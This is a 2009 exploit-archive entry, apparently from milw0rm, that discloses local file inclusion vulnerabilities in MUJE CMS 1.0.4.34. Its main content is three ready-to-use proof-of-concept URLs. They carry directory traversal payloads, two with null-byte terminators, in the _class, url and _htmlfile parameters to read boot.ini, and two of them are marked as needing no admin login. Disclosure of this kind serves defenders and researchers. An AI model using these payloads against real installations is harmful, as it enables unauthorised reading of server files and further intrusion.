MUJE CMS 1.0.4.34 - Local File Inclusion



EKU-ID: 17090 CVE: OSVDB-58484;CVE-2009-3508;OSVDB-58483;OSVDB-56637 OSVDB-ID:
Author: SirGod Published: 2009-07-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


####################################################################################
[+] MUJE CMS 1.0.4.34 Local File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
####################################################################################

[+] Download : http://sourceforge.net/projects/mujecms/

[+] Local File Inclusion

 - No admin required

 - PoC's

    http://127.0.0.1/path/admin.php?_class=../../../../../../boot.ini%00

    http://127.0.0.1/path/install/install.php?url=../../../../../../../boot.ini


 - Admin required

    http://127.0.0.1/path/admin.php?_htmlfile=../../../../../../boot.ini%00

####################################################################################

# milw0rm.com [2009-07-30]